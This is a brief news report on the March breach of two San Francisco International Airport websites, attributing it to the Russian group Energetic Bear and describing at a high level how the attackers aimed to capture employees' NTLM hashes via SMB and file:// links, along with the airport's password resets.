After investigations from ESET researchers, the hackers behind the San Francisco International Airport’s websites reported last week were determined to be Energetic Bear. This is claimed to be a Russian state-backed group, which was also known as DragonFly.
Researchers say that the actual intention of the hack was not to steal credentials, but the windows credentials as usernames and NTLM hashes. This is by exploiting the SMB feature and file:// prefix. This ultimate goal was to attain network-wide access by compromising one of the employee’s credentials.
From Energy to Aviation – Energetic Bear
San Francisco International Airport is the largest in the Bay Area, having international flights to tens of countries. The airport management has reported a security breach happened on two of its subsidiary websites, SFOConnect and SFOConstruction. While the former one was used for employees, the later ones dedicated to construction contractors. These two were reported to be breached on March 23 this year, but the airport disclosed the incident last week.
Now, analysis from ESET researchers reveals the hack was linked to Russian state-backed groups called, Energetic Bear or DragonFly. This was active since 2010 and has been preying on energy companies mostly. It’s even found expanding to the aviation and aerospace sectors lately. A metric that led ESET researchers to link this breach to Energetic Bear was the intention of obtaining NTLM credentials.
Aiming for network sabotaging?
The hack, which was previously reported by the airport to be for stealing visitors’ credentials, is actually for stealing employees’ Windows credentials as their usernames and NTLM hashes. These were done by exploiting the SMB feature and file:// prefix of internet explorer. The final goal here is to crack the NTLM hashes and obtain clear passwords, thus gaining access into the airport’s internal network will enable the hacker to spread into other areas and completely sabotage the network.
As of now, the airport has already said to be removing the malicious codes detected in those two websites, and even force reset passwords of the network. Further, it even suggested those who’ve logged into those two websites recently to change passwords as a precaution.